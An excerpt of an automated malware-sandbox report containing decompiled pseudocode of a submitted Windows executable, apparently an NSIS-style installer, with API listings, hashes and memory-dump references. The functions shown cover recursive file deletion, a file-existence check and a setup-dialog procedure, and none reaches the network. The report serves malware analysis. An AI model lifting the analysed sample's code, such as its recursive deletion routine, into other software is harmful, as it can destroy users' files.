							if( *_t76 != 0x2e) {
								L19:
								E00406257(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059D1(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405378(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4524a8 =  *0x4524a8 + 1;
										} else {
											E00405378(0xfffffff1, _t73);
											E00406030(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A19(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x444098 - 0x5c;
					if( *0x444098 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065CE(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE9(_t73);
							_t40 = E004059D1(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405378(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405378(0xfffffff1, _t73);
							return E00406030(_t72, _t73, 0);
						}
						L33:
						 *0x4524a8 =  *0x4524a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                            0x00405a23
                                                            0x00405a28
                                                            0x00405a31
                                                            0x00405a34
                                                            0x00405a3c
                                                            0x00405a3f
                                                            0x00405a42
                                                            0x00405a4a
                                                            0x00405a4c
                                                            0x00405a4d
                                                            0x00000000
                                                            0x00405a4d
                                                            0x00405a58
                                                            0x00405a5b
                                                            0x00405a5b
                                                            0x00405a5b
                                                            0x00405a5f
                                                            0x00405a72
                                                            0x00405a79
                                                            0x00405a7e
                                                            0x00405a82
                                                            0x00405a92
                                                            0x00405a84
                                                            0x00405a8a
                                                            0x00405a8a
                                                            0x00405a97
                                                            0x00405a9a
                                                            0x00405aa5
                                                            0x00405aab
                                                            0x00405ab0
                                                            0x00405ac0
                                                            0x00405ac2
                                                            0x00405ac8
                                                            0x00405acb
                                                            0x00405ace
                                                            0x00405b86
                                                            0x00405b86
                                                            0x00405b8a
                                                            0x00405b8c
                                                            0x00405b8c
                                                            0x00405b8c
                                                            0x00405b8c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405ad4
                                                            0x00405ad4
                                                            0x00405add
                                                            0x00405ae3
                                                            0x00405ae8
                                                            0x00405aeb
                                                            0x00405aed
                                                            0x00405af1
                                                            0x00405af3
                                                            0x00405af3
                                                            0x00405af1
                                                            0x00405af6
                                                            0x00405af9
                                                            0x00405b0c
                                                            0x00405b0e
                                                            0x00405b13
                                                            0x00405b1a
                                                            0x00405b35
                                                            0x00405b3a
                                                            0x00405b3c
                                                            0x00405b60
                                                            0x00405b3e
                                                            0x00405b3e
                                                            0x00405b41
                                                            0x00405b55
                                                            0x00405b43
                                                            0x00405b46
                                                            0x00405b4e
                                                            0x00405b4e
                                                            0x00405b41
                                                            0x00405b1c
                                                            0x00405b22
                                                            0x00405b24
                                                            0x00405b2a
                                                            0x00405b2a
                                                            0x00405b24
                                                            0x00000000
                                                            0x00405b1a
                                                            0x00405afb
                                                            0x00405afe
                                                            0x00405b00
                                                            0x00000000
                                                            0x00000000
                                                            0x00405b02
                                                            0x00405b04
                                                            0x00000000
                                                            0x00000000
                                                            0x00405b06
                                                            0x00405b0a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405b65
                                                            0x00405b6f
                                                            0x00405b75
                                                            0x00405b75
                                                            0x00405b80
                                                            0x00000000
                                                            0x00405b80
                                                            0x00405a9c
                                                            0x00405aa3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a61
                                                            0x00405a61
                                                            0x00405a63
                                                            0x00405b90
                                                            0x00405b92
                                                            0x00405b95
                                                            0x00405be6
                                                            0x00405be6
                                                            0x00405be6
                                                            0x00405b97
                                                            0x00405b9a
                                                            0x00405ba5
                                                            0x00405baa
                                                            0x00405bac
                                                            0x00000000
                                                            0x00000000
                                                            0x00405baf
                                                            0x00405bbb
                                                            0x00405bc0
                                                            0x00405bc2
                                                            0x00000000
                                                            0x00405bdd
                                                            0x00405bc4
                                                            0x00405bc7
                                                            0x00000000
                                                            0x00000000
                                                            0x00405bcc
                                                            0x00000000
                                                            0x00405bd3
                                                            0x00405b9c
                                                            0x00405b9c
                                                            0x00000000
                                                            0x00405b9c
                                                            0x00405a69
                                                            0x00405a6c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a6c

                                                            APIs
                                                            • DeleteFileA.KERNELBASE(?,?,75572754,00485000,0047B000), ref: 00405A42
                                                            • lstrcatA.KERNEL32(00444098,\*.*,00444098,?,?,75572754,00485000,0047B000), ref: 00405A8A
                                                            • lstrcatA.KERNEL32(?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AAB
                                                            • lstrlenA.KERNEL32(?,?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AB1
                                                            • FindFirstFileA.KERNEL32(00444098,?,?,?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AC2
                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                            • FindClose.KERNEL32(00000000), ref: 00405B80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: \*.*
                                                            • API String ID: 2035342205-1173974218
                                                            • Opcode ID: e17e1998f97f5d9c0b05528d7d3f480da4ab8f2a36dede4038293de73e58a342
                                                            • Instruction ID: 7373f7c24065ba85377ce78181eb49bf834506ffe63cf7a55ce9c7ac78545b15
                                                            • Opcode Fuzzy Hash: e17e1998f97f5d9c0b05528d7d3f480da4ab8f2a36dede4038293de73e58a342
                                                            • Instruction Fuzzy Hash: 4651DE30904A08AADB22AB618C89BAF7B78DF42314F24417BF441752D2C77CA981DE6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004065CE Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004065CE(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4480e0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x4480e0;
			}




                                                            0x004065d9
                                                            0x004065e2
                                                            0x00000000
                                                            0x004065ef
                                                            0x004065e5
                                                            0x00000000

                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(00000020,004480E0,00446098,00405D1A,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 004065D9
                                                            • FindClose.KERNELBASE(00000000), ref: 004065E5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 91897166837ccdaf6e79e8037e8f47a8f79e1353e4b75f269b86cd68fbfe55b9
                                                            • Instruction ID: fd41d54537010d52f50df7b9b8b9e3478e19d392ae6c51f4a024acc321f66cb9
                                                            • Opcode Fuzzy Hash: 91897166837ccdaf6e79e8037e8f47a8f79e1353e4b75f269b86cd68fbfe55b9
                                                            • Instruction Fuzzy Hash: 89D01231514520ABD7516B38BD0C85B7A58AF053313228A3AF066F22E4CF34CC22969C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403DDA Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 195 403dda-403dec 196 403df2-403df8 195->196 197 403f53-403f62 195->197 196->197 198 403dfe-403e07 196->198 199 403fb1-403fc6 197->199 200 403f64-403fac GetDlgItem * 2 call 4042d4 SetClassLongA call 40140b 197->200 204 403e09-403e16 SetWindowPos 198->204 205 403e1c-403e23 198->205 202 404006-40400b call 404320 199->202 203 403fc8-403fcb 199->203 200->199 217 404010-40402b 202->217 207 403fcd-403fd8 call 401389 203->207 208 403ffe-404000 203->208 204->205 210 403e25-403e3f ShowWindow 205->210 211 403e67-403e6d 205->211 207->208 234 403fda-403ff9 SendMessageA 207->234 208->202 216 4042a1 208->216 218 403f40-403f4e call 40433b 210->218 219 403e45-403e58 GetWindowLongA 210->219 213 403e86-403e89 211->213 214 403e6f-403e81 DestroyWindow 211->214 224 403e8b-403e97 SetWindowLongA 213->224 225 403e9c-403ea2 213->225 222 40427e-404284 214->222 223 4042a3-4042aa 216->223 228 404034-40403a 217->228 229 40402d-40402f call 40140b 217->229 218->223 219->218 220 403e5e-403e61 ShowWindow 219->220 220->211 222->216 230 404286-40428c 222->230 224->223 225->218 233 403ea8-403eb7 GetDlgItem 225->233 231 404040-40404b 228->231 232 40425f-404278 DestroyWindow EndDialog 228->232 229->228 230->216 237 40428e-404297 ShowWindow 230->237 231->232 238 404051-40409e call 4062ea call 4042d4 * 3 GetDlgItem 231->238 232->222 239 403ed6-403ed9 233->239 240 403eb9-403ed0 SendMessageA IsWindowEnabled 233->240 234->223 237->216 267 4040a0-4040a5 238->267 268 4040a8-4040e4 ShowWindow KiUserCallbackDispatcher call 4042f6 EnableWindow 238->268 242 403edb-403edc 239->242 243 403ede-403ee1 239->243 240->216 240->239 245 403f0c-403f11 call 4042ad 242->245 246 403ee3-403ee9 243->246 247 403eef-403ef4 243->247 245->218 250 403f2a-403f3a SendMessageA 246->250 251 403eeb-403eed 246->251 247->250 252 403ef6-403efc 247->252 250->218 251->245 255 403f13-403f1c call 40140b 252->255 256 403efe-403f04 call 40140b 252->256 255->218 265 403f1e-403f28 255->265 263 403f0a 256->263 263->245 265->263 267->268 271 4040e6-4040e7 268->271 272 4040e9 268->272 273 4040eb-404119 GetSystemMenu EnableMenuItem SendMessageA 271->273 272->273 274 40411b-40412c SendMessageA 273->274 275 40412e 273->275 276 404134-40416e call 404309 call 403dbb call 406257 lstrlenA call 4062ea SetWindowTextA call 401389 274->276 275->276 276->217 287 404174-404176 276->287 287->217 288 40417c-404180 287->288 289 404182-404188 288->289 290 40419f-4041b3 DestroyWindow 288->290 289->216 291 40418e-404194 289->291 290->222 292 4041b9-4041e6 CreateDialogParamA 290->292 291->217 293 40419a 291->293 292->222 294 4041ec-404243 call 4042d4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 292->294 293->216 294->216 299 404245-404258 ShowWindow call 404320 294->299 301 40425d 299->301 301->222
                                                            C-Code - Quality: 84%
                                                            			E00403DDA(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				signed int _t36;
				struct HWND__* _t46;
				signed int _t65;
				struct HWND__* _t71;
				signed int _t84;
				struct HWND__* _t89;
				signed int _t97;
				int _t101;
				signed int _t115;
				int _t116;
				int _t120;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				intOrPtr _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;

				_t128 = _a8;
				if(_t128 == 0x110 || _t128 == 0x408) {
					_t32 = _a12;
					_t125 = _a4;
					__eflags = _t128 - 0x110;
					 *0x43c078 = _t32;
					if(_t128 == 0x110) {
						 *0x452428 = _t125;
						 *0x43c08c = GetDlgItem(_t125, 1);
						_t89 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x434058 = _t89;
						E004042D4(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x44e408);
						 *0x44e3ec = E0040140B(4);
						_t32 = 1;
						__eflags = 1;
						 *0x43c078 = 1;
					}
					_t122 =  *0x40a1dc; // 0x0
					_t134 = 0;
					_t131 = (_t122 << 6) +  *0x452440;
					__eflags = _t122;
					if(_t122 < 0) {
						L36:
						E00404320(0x40b);
						while(1) {
							_t34 =  *0x43c078;
							 *0x40a1dc =  *0x40a1dc + _t34;
							_t131 = _t131 + (_t34 << 6);
							_t36 =  *0x40a1dc; // 0x0
							__eflags = _t36 -  *0x452444;
							if(_t36 ==  *0x452444) {
								E0040140B(1);
							}
							__eflags =  *0x44e3ec - _t134;
							if( *0x44e3ec != _t134) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x452444; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t115 =  *(_t131 + 0x14);
							E004062EA(_t115, _t125, _t131, 0x48f000,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D4(_t125);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D4(_t125);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D4(_t125);
							_t46 = GetDlgItem(_t125, 3);
							__eflags =  *0x4524ac - _t134;
							_v28 = _t46;
							if( *0x4524ac != _t134) {
								_t115 = _t115 & 0x0000fefd | 0x00000004;
								__eflags = _t115;
							}
							ShowWindow(_t46, _t115 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x34), _t115 & 0x00000100); // executed
							E004042F6(_t115 & 0x00000002);
							_t116 = _t115 & 0x00000004;
							EnableWindow( *0x434058, _t116);
							__eflags = _t116 - _t134;
							if(_t116 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x3c), 0xf4, _t134, 1);
							__eflags =  *0x4524ac - _t134;
							if( *0x4524ac == _t134) {
								_push( *0x43c08c);
							} else {
								SendMessageA(_t125, 0x401, 2, _t134);
								_push( *0x434058);
							}
							E00404309();
							E00406257(0x43c090, E00403DBB());
							E004062EA(0x43c090, _t125, _t131,  &(0x43c090[lstrlenA(0x43c090)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t125, 0x43c090); // executed
							_push(_t134);
							_t65 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x44e3f8); // executed
									 *0x438068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L60;
									}
									_t71 = CreateDialogParamA( *0x452420,  *_t131 +  *0x44e400 & 0x0000ffff, _t125,  *( *(_t131 + 4) * 4 + "?D@"), _t131); // executed
									__eflags = _t71 - _t134;
									 *0x44e3f8 = _t71;
									if(_t71 == _t134) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D4(_t71);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t125, _t135 + 0x10);
									SetWindowPos( *0x44e3f8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x44e3ec - _t134;
									if( *0x44e3ec != _t134) {
										goto L63;
									}
									ShowWindow( *0x44e3f8, 8); // executed
									E00404320(0x405);
									goto L60;
								}
								__eflags =  *0x4524ac - _t134;
								if( *0x4524ac != _t134) {
									goto L63;
								}
								__eflags =  *0x4524a0 - _t134;
								if( *0x4524a0 != _t134) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x44e3f8);
						 *0x452428 = _t134;
						EndDialog(_t125,  *0x436060);
						goto L60;
					} else {
						__eflags = _t32 - 1;
						if(_t32 != 1) {
							L35:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t84 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L35;
						}
						SendMessageA( *0x44e3f8, 0x40f, 0, 1);
						__eflags =  *0x44e3ec;
						return 0 |  *0x44e3ec == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t134 = 0;
					if(_t128 == 0x47) {
						SetWindowPos( *0x43c070, _t125, 0, 0, 0, 0, 0x13);
					}
					_t120 = _a12;
					if(_t128 != 5) {
						L8:
						if(_t128 != 0x40d) {
							__eflags = _t128 - 0x11;
							if(_t128 != 0x11) {
								__eflags = _t128 - 0x111;
								if(_t128 != 0x111) {
									goto L28;
								}
								_t133 = _t120 & 0x0000ffff;
								_t126 = GetDlgItem(_t125, _t133);
								__eflags = _t126 - _t134;
								if(_t126 == _t134) {
									L15:
									__eflags = _t133 - 1;
									if(_t133 != 1) {
										__eflags = _t133 - 3;
										if(_t133 != 3) {
											_t127 = 2;
											__eflags = _t133 - _t127;
											if(_t133 != _t127) {
												L27:
												SendMessageA( *0x44e3f8, 0x111, _t120, _a16);
												goto L28;
											}
											__eflags =  *0x4524ac - _t134;
											if( *0x4524ac == _t134) {
												_t97 = E0040140B(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L28;
												}
												 *0x436060 = 1;
												L23:
												_push(0x78);
												L24:
												E004042AD();
												goto L28;
											}
											E0040140B(_t127);
											 *0x436060 = _t127;
											goto L23;
										}
										__eflags =  *0x40a1dc - _t134; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t133);
									goto L24;
								}
								SendMessageA(_t126, 0xf3, _t134, _t134);
								_t101 = IsWindowEnabled(_t126);
								__eflags = _t101;
								if(_t101 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongA(_t125, _t134, _t134);
							return 1;
						}
						DestroyWindow( *0x44e3f8);
						 *0x44e3f8 = _t120;
						L60:
						if( *0x444090 == _t134 &&  *0x44e3f8 != _t134) {
							ShowWindow(_t125, 0xa); // executed
							 *0x444090 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x43c070,  ~(_t120 - 1) & 0x00000005);
						if(_t120 != 2 || (GetWindowLongA(_t125, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040433B(_a8, _t120, _a16);
						} else {
							ShowWindow(_t125, 4);
							goto L8;
						}
					}
				}
			}































                                                            0x00403de5
                                                            0x00403dec
                                                            0x00403f53
                                                            0x00403f57
                                                            0x00403f5b
                                                            0x00403f5d
                                                            0x00403f62
                                                            0x00403f6d
                                                            0x00403f78
                                                            0x00403f7d
                                                            0x00403f7f
                                                            0x00403f81
                                                            0x00403f84
                                                            0x00403f89
                                                            0x00403f97
                                                            0x00403fa4
                                                            0x00403fab
                                                            0x00403fab
                                                            0x00403fac
                                                            0x00403fac
                                                            0x00403fb1
                                                            0x00403fb7
                                                            0x00403fbe
                                                            0x00403fc4
                                                            0x00403fc6
                                                            0x00404006
                                                            0x0040400b
                                                            0x00404010
                                                            0x00404010
                                                            0x00404015
                                                            0x0040401e
                                                            0x00404020
                                                            0x00404025
                                                            0x0040402b
                                                            0x0040402f
                                                            0x0040402f
                                                            0x00404034
                                                            0x0040403a
                                                            0x00000000
                                                            0x00000000
                                                            0x00404045
                                                            0x0040404b
                                                            0x00000000
                                                            0x00000000
                                                            0x00404054
                                                            0x0040405c
                                                            0x00404061
                                                            0x00404064
                                                            0x0040406a
                                                            0x0040406f
                                                            0x00404072
                                                            0x00404078
                                                            0x0040407d
                                                            0x00404080
                                                            0x00404086
                                                            0x0040408e
                                                            0x00404094
                                                            0x0040409a
                                                            0x0040409e
                                                            0x004040a5
                                                            0x004040a5
                                                            0x004040a5
                                                            0x004040af
                                                            0x004040c1
                                                            0x004040cd
                                                            0x004040d2
                                                            0x004040dc
                                                            0x004040e2
                                                            0x004040e4
                                                            0x004040e9
                                                            0x004040e6
                                                            0x004040e6
                                                            0x004040e6
                                                            0x004040f9
                                                            0x00404111
                                                            0x00404113
                                                            0x00404119
                                                            0x0040412e
                                                            0x0040411b
                                                            0x00404124
                                                            0x00404126
                                                            0x00404126
                                                            0x00404134
                                                            0x00404145
                                                            0x00404156
                                                            0x0040415d
                                                            0x00404163
                                                            0x00404167
                                                            0x0040416c
                                                            0x0040416e
                                                            0x00000000
                                                            0x00404174
                                                            0x00404174
                                                            0x00404176
                                                            0x00000000
                                                            0x00000000
                                                            0x0040417c
                                                            0x00404180
                                                            0x004041a5
                                                            0x004041ab
                                                            0x004041b1
                                                            0x004041b3
                                                            0x00000000
                                                            0x00000000
                                                            0x004041d9
                                                            0x004041df
                                                            0x004041e1
                                                            0x004041e6
                                                            0x00000000
                                                            0x00000000
                                                            0x004041ec
                                                            0x004041ef
                                                            0x004041f2
                                                            0x00404209
                                                            0x00404215
                                                            0x0040422e
                                                            0x00404234
                                                            0x00404238
                                                            0x0040423d
                                                            0x00404243
                                                            0x00000000
                                                            0x00000000
                                                            0x0040424d
                                                            0x00404258
                                                            0x00000000
                                                            0x00404258
                                                            0x00404182
                                                            0x00404188
                                                            0x00000000
                                                            0x00000000
                                                            0x0040418e
                                                            0x00404194
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040419a
                                                            0x0040416e
                                                            0x00404265
                                                            0x00404271
                                                            0x00404278
                                                            0x00000000
                                                            0x00403fc8
                                                            0x00403fc8
                                                            0x00403fcb
                                                            0x00403ffe
                                                            0x00403ffe
                                                            0x00404000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404000
                                                            0x00403fcd
                                                            0x00403fd1
                                                            0x00403fd6
                                                            0x00403fd8
                                                            0x00000000
                                                            0x00000000
                                                            0x00403fe8
                                                            0x00403ff0
                                                            0x00000000
                                                            0x00403ff6
                                                            0x00403dfe
                                                            0x00403dfe
                                                            0x00403e02
                                                            0x00403e07
                                                            0x00403e16
                                                            0x00403e16
                                                            0x00403e1c
                                                            0x00403e23
                                                            0x00403e67
                                                            0x00403e6d
                                                            0x00403e86
                                                            0x00403e89
                                                            0x00403e9c
                                                            0x00403ea2
                                                            0x00000000
                                                            0x00000000
                                                            0x00403ea8
                                                            0x00403eb3
                                                            0x00403eb5
                                                            0x00403eb7
                                                            0x00403ed6
                                                            0x00403ed6
                                                            0x00403ed9
                                                            0x00403ede
                                                            0x00403ee1
                                                            0x00403ef1
                                                            0x00403ef2
                                                            0x00403ef4
                                                            0x00403f2a
                                                            0x00403f3a
                                                            0x00000000
                                                            0x00403f3a
                                                            0x00403ef6
                                                            0x00403efc
                                                            0x00403f15
                                                            0x00403f1a
                                                            0x00403f1c
                                                            0x00000000
                                                            0x00000000
                                                            0x00403f1e
                                                            0x00403f0a
                                                            0x00403f0a
                                                            0x00403f0c
                                                            0x00403f0c
                                                            0x00000000
                                                            0x00403f0c
                                                            0x00403eff
                                                            0x00403f04
                                                            0x00000000
                                                            0x00403f04
                                                            0x00403ee3
                                                            0x00403ee9
                                                            0x00000000
                                                            0x00000000
                                                            0x00403eeb
                                                            0x00000000
                                                            0x00403eeb
                                                            0x00403edb
                                                            0x00000000
                                                            0x00403edb
                                                            0x00403ec1
                                                            0x00403ec8
                                                            0x00403ece
                                                            0x00403ed0
                                                            0x004042a1
                                                            0x00000000
                                                            0x004042a1
                                                            0x00000000
                                                            0x00403ed0
                                                            0x00403e8e
                                                            0x00000000
                                                            0x00403e96
                                                            0x00403e75
                                                            0x00403e7b
                                                            0x0040427e
                                                            0x00404284
                                                            0x00404291
                                                            0x00404297
                                                            0x00404297
                                                            0x00000000
                                                            0x00403e25
                                                            0x00403e2a
                                                            0x00403e36
                                                            0x00403e3f
                                                            0x00403f40
                                                            0x00000000
                                                            0x00403e5e
                                                            0x00403e61
                                                            0x00000000
                                                            0x00403e61
                                                            0x00403e3f
                                                            0x00403e23

                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E16
                                                            • ShowWindow.USER32(?), ref: 00403E36
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00403E48
                                                            • ShowWindow.USER32(?,00000004), ref: 00403E61
                                                            • DestroyWindow.USER32 ref: 00403E75
                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E8E
                                                            • GetDlgItem.USER32(?,?), ref: 00403EAD
                                                            • SendMessageA.USER32 ref: 00403EC1
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403EC8
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403F73
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403F7D
                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403F97
                                                            • SendMessageA.USER32 ref: 00403FE8
                                                            • GetDlgItem.USER32(?,00000003), ref: 0040408E
                                                            • ShowWindow.USER32(00000000,?), ref: 004040AF
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040C1
                                                            • EnableWindow.USER32(?,?), ref: 004040DC
                                                            • GetSystemMenu.USER32 ref: 004040F2
                                                            • EnableMenuItem.USER32 ref: 004040F9
                                                            • SendMessageA.USER32 ref: 00404111
                                                            • SendMessageA.USER32 ref: 00404124
                                                            • lstrlenA.KERNEL32(0043C090,?,0043C090,00000000), ref: 0040414E
